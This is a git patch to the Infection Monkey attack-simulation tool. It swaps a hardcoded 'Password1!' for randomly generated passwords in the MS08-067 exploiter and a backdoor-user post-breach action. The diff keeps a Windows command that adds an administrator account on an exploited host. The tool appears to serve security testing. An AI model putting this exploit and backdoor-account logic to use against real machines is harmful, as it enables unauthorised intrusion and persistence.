From 51b996ce1874589f741a78cf25703f4f572cf60b Mon Sep 17 00:00:00 2001
From: Shreya <shreya.malviya@gmail.com>
Date: Mon, 17 May 2021 18:54:45 +0530
Subject: [PATCH] Generate password randomly when creating a new user for
 Create User PBA and exploit MS08_67 using
 https://docs.python.org/3.7/library/secrets.html#secrets.token_urlsafe

---
 monkey/infection_monkey/config.py                          | 1 -
 monkey/infection_monkey/example.conf                       | 1 -
 monkey/infection_monkey/exploit/win_ms08_067.py            | 6 ++++--
 monkey/infection_monkey/post_breach/actions/add_user.py    | 6 +++++-
 monkey/infection_monkey/utils/random_password_generator.py | 6 ++++++
 monkey/monkey_island/cc/services/config_schema/internal.py | 6 ------
 6 files changed, 15 insertions(+), 11 deletions(-)
 create mode 100644 monkey/infection_monkey/utils/random_password_generator.py

diff --git a/monkey/infection_monkey/config.py b/monkey/infection_monkey/config.py
index ad37bf837..d00d55814 100644
--- a/monkey/infection_monkey/config.py
+++ b/monkey/infection_monkey/config.py
@@ -192,7 +192,6 @@ class Configuration(object):
 
     ms08_067_exploit_attempts = 5
     user_to_add = "Monkey_IUSER_SUPPORT"
-    remote_user_pass = "Password1!"
 
     # User and password dictionaries for exploits.
 
diff --git a/monkey/infection_monkey/example.conf b/monkey/infection_monkey/example.conf
index b27f2f3cc..774d69aed 100644
--- a/monkey/infection_monkey/example.conf
+++ b/monkey/infection_monkey/example.conf
@@ -61,7 +61,6 @@
   "send_log_to_server": true,
   "ms08_067_exploit_attempts": 5,
   "user_to_add": "Monkey_IUSER_SUPPORT",
-  "remote_user_pass": "Password1!",
   "ping_scan_timeout": 10000,
   "smb_download_timeout": 300,
   "smb_service_name": "InfectionMonkey",
diff --git a/monkey/infection_monkey/exploit/win_ms08_067.py b/monkey/infection_monkey/exploit/win_ms08_067.py
index 16b971cd8..8e6daa8f4 100644
--- a/monkey/infection_monkey/exploit/win_ms08_067.py
+++ b/monkey/infection_monkey/exploit/win_ms08_067.py
@@ -25,6 +25,7 @@ from infection_monkey.exploit.tools.smb_tools import SmbTools
 from infection_monkey.model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS
 from infection_monkey.network.smbfinger import SMBFinger
 from infection_monkey.network.tools import check_tcp_port
+from infection_monkey.utils.random_password_generator import get_random_password
 
 LOG = getLogger(__name__)
 
@@ -230,6 +231,7 @@ class Ms08_067_Exploiter(HostExploiter):
         )
 
         exploited = False
+        remote_user_pwd = get_random_password()
         for _ in range(self._config.ms08_067_exploit_attempts):
             exploit = SRVSVC_Exploit(target_addr=self.host.ip_addr, os_version=os_version)
 
@@ -240,7 +242,7 @@ class Ms08_067_Exploiter(HostExploiter):
                     "cmd /c (net user {} {} /add) &&"
                     " (net localgroup administrators {} /add)\r\n".format(
                         self._config.user_to_add,
-                        self._config.remote_user_pass,
+                        remote_user_pwd,
                         self._config.user_to_add,
                     ).encode()
                 )
@@ -264,7 +266,7 @@ class Ms08_067_Exploiter(HostExploiter):
             src_path,
             self._config.dropper_target_path_win_32,
             self._config.user_to_add,
-            self._config.remote_user_pass,
+            remote_user_pwd,
         )
 
         if not remote_full_path:
diff --git a/monkey/infection_monkey/post_breach/actions/add_user.py b/monkey/infection_monkey/post_breach/actions/add_user.py
index cae5a2428..7e92eaf84 100644
--- a/monkey/infection_monkey/post_breach/actions/add_user.py
+++ b/monkey/infection_monkey/post_breach/actions/add_user.py
@@ -1,14 +1,18 @@
 from common.common_consts.post_breach_consts import POST_BREACH_BACKDOOR_USER
 from infection_monkey.config import WormConfiguration
 from infection_monkey.post_breach.pba import PBA
+from infection_monkey.utils.random_password_generator import get_random_password
 from infection_monkey.utils.users import get_commands_to_add_user
 
 
 class BackdoorUser(PBA):
     def __init__(self):
+        remote_user_pwd = get_random_password()
+
         linux_cmds, windows_cmds = get_commands_to_add_user(
-            WormConfiguration.user_to_add, WormConfiguration.remote_user_pass
+            WormConfiguration.user_to_add, remote_user_pwd
         )
+
         super(BackdoorUser, self).__init__(
             POST_BREACH_BACKDOOR_USER, linux_cmd=" ".join(linux_cmds), windows_cmd=windows_cmds
         )
diff --git a/monkey/infection_monkey/utils/random_password_generator.py b/monkey/infection_monkey/utils/random_password_generator.py
new file mode 100644
index 000000000..d205a9a01
--- /dev/null
+++ b/monkey/infection_monkey/utils/random_password_generator.py
@@ -0,0 +1,6 @@
+import secrets
+
+
+def get_random_password(length: int = 12) -> str:
+    password = secrets.token_urlsafe(length)
+    return password
diff --git a/monkey/monkey_island/cc/services/config_schema/internal.py b/monkey/monkey_island/cc/services/config_schema/internal.py
index c42992d1b..1ce1c864b 100644
--- a/monkey/monkey_island/cc/services/config_schema/internal.py
+++ b/monkey/monkey_island/cc/services/config_schema/internal.py
@@ -397,12 +397,6 @@ INTERNAL = {
                             "default": "Monkey_IUSER_SUPPORT",
                             "description": "Username to add on successful exploit",
                         },
-                        "remote_user_pass": {
-                            "title": "Remote user password",
-                            "type": "string",
-                            "default": "Password1!",
-                            "description": "Password to use for created user",
-                        },
                     },
                 },
                 "sambacry": {